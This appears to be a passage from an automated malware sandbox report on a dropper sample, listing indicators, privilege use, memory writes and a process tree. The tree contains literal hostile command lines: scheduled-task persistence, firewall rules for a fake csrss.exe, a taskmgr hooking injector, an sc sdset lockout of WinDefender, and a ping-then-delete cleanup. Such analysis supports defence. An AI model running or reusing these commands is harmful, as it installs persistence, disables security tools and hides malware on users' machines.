551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e WZ5cX3pyFhvxZFq1AmkufeHv.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegAsm.exeu2dw.0.exedialer.exepowershell.exepowershell.exepowershell.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepowershell.exepowershell.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepid Process 1108 RegAsm.exe 1108 RegAsm.exe 3636 u2dw.0.exe 3636 u2dw.0.exe 5016 dialer.exe 5016 dialer.exe 4264 powershell.exe 4264 powershell.exe 1852 powershell.exe 1852 powershell.exe 4200 powershell.exe 4200 powershell.exe 5016 dialer.exe 5016 dialer.exe 1852 powershell.exe 4200 powershell.exe 4264 powershell.exe 3636 u2dw.0.exe 3636 u2dw.0.exe 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 4204 powershell.exe 4204 powershell.exe 1908 powershell.exe 1908 powershell.exe 4204 powershell.exe 1908 powershell.exe 4196 powershell.exe 4196 powershell.exe 4196 powershell.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 5724 powershell.exe 5724 powershell.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
installutil.exepowershell.exepowershell.exepowershell.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.execsrss.exesc.exepowershell.exepowershell.exepowershell.EXEdescription pid Process Token: SeDebugPrivilege 1472 installutil.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe Token: SeDebugPrivilege 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe Token: SeImpersonatePrivilege 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe Token: SeImpersonatePrivilege 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe Token: SeDebugPrivilege 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe Token: SeImpersonatePrivilege 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 5724 powershell.exe Token: SeDebugPrivilege 6004 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 5452 powershell.exe Token: SeDebugPrivilege 5708 powershell.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeDebugPrivilege 2952 powershell.EXE Token: SeDebugPrivilege 6100 powershell.exe Token: SeDebugPrivilege 4444 powershell.EXE Token: SeDebugPrivilege 5796 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeSystemEnvironmentPrivilege 6108 csrss.exe Token: SeSecurityPrivilege 5920 sc.exe Token: SeSecurityPrivilege 5920 sc.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 516 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u2dw.1.exepid Process 4940 u2dw.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exeinstallutil.exeO0CPJ0FFbJ7m6QGvaPcCCRWK.exeGJJottccSrZvHDi2rOc2biM9.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exeRegAsm.exeu2dw.1.execmd.exeWZ5cX3pyFhvxZFq1AmkufeHv.exedescription pid Process procid_target PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 1472 wrote to memory of 3180 1472 installutil.exe 92 PID 1472 wrote to memory of 3180 1472 installutil.exe 92 PID 1472 wrote to memory of 3180 1472 installutil.exe 92 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 3092 wrote to memory of 4940 3092 GJJottccSrZvHDi2rOc2biM9.exe 110 PID 3092 wrote to memory of 4940 3092 GJJottccSrZvHDi2rOc2biM9.exe 110 PID 3092 wrote to memory of 4940 3092 GJJottccSrZvHDi2rOc2biM9.exe 110 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 856 wrote to memory of 1904 856 WZ5cX3pyFhvxZFq1AmkufeHv.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2600
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5016
-
-
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"5⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe7⤵PID:5988
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:2268
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 26285⤵
- Program crash
PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:4516
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 15324⤵
- Program crash
PID:2200
-
-
-
C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6125⤵
- Program crash
PID:2664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6165⤵
- Program crash
PID:2032
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 8524⤵
- Program crash
PID:2516
-
-
-
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:6024
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5220
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4264
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5268
-
-
-
-
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5564
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5640
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5724
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2796
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3488
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5144
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1344
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2836
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:5920
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5492
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5608
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:6004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5708
-
-
-
-
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exeC:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e2ce1a8,0x6e2ce1b4,0x6e2ce1c04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2560
-
-
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=856 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328021940" --session-guid=359b9ff4-76a1-4233-8f30-0c8fd2afda91 